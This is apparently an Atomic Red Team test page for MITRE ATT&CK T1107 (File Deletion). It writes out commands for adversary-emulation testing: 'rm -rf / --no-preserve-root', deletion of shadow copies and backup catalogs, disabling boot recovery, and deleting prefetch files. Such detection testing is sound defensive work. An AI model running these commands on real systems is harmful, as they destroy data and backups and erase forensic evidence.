Skip to content

Latest commit

 

History

History
320 lines (156 loc) · 6.67 KB

T1107.md

File metadata and controls

320 lines (156 loc) · 6.67 KB

T1107 - File Deletion

Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

Atomic Tests


Atomic Test #1 - Delete a single file - Linux/macOS

Delete a single file from the temporary directory

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
file_to_delete Path of file to delete Path /tmp/victim-files/a

Attack Commands: Run with sh!

rm -f #{file_to_delete}


Atomic Test #2 - Delete an entire folder - Linux/macOS

Recursively delete the temporary directory and all files contained within it

Supported Platforms: Linux, macOS

Inputs:

Name Description Type Default Value
folder_to_delete Path of folder to delete Path /tmp/victim-files

Attack Commands: Run with sh!

rm -rf #{folder_to_delete}


Atomic Test #3 - Overwrite and delete a file with shred

Use the shred command to overwrite the temporary file and then delete it

Supported Platforms: Linux

Inputs:

Name Description Type Default Value
file_to_shred Path of file to shred Path /tmp/victim-shred.txt

Attack Commands: Run with sh!

shred -u #{file_to_shred}


Atomic Test #4 - Delete a single file - Windows cmd

Delete a single file from the temporary directory using cmd.exe

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

echo "T1107" > %temp%\T1107.txt
del /f  %temp%\T1107.txt


Atomic Test #5 - Delete an entire folder - Windows cmd

Recursively delete the temporary directory and all files contained within it using cmd.exe

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

mkdir %temp%\T1107
rmdir /s /q %temp%\T1107


Atomic Test #6 - Delete a single file - Windows PowerShell

Delete a single file from the temporary directory using Powershell

Supported Platforms: Windows

Attack Commands: Run with powershell!

New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt


Atomic Test #7 - Delete an entire folder - Windows PowerShell

Recursively delete the temporary directory and all files contained within it using Powershell

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
folder_to_delete Path of folder to delete Path C:\Windows\Temp\victim-files-ps

Attack Commands: Run with powershell!

New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse


Atomic Test #8 - Delete VSS - vssadmin

Delete all volume shadow copies with vssadmin.exe

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

vssadmin.exe Delete Shadows /All /Quiet


Atomic Test #9 - Delete VSS - wmic

Delete all volume shadow copies with wmic

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

wmic shadowcopy delete


Atomic Test #10 - bcdedit

This test leverages bcdedit to remove boot-time recovery measures.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no


Atomic Test #11 - wbadmin

This test deletes Windows Backup catalogs.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

wbadmin delete catalog -quiet


Atomic Test #12 - Delete Filesystem - Linux

This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.

Supported Platforms: Linux

Attack Commands: Run with bash!

rm -rf / --no-preserve-root > /dev/null 2> /dev/null


Atomic Test #13 - Delete-PrefetchFile

Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])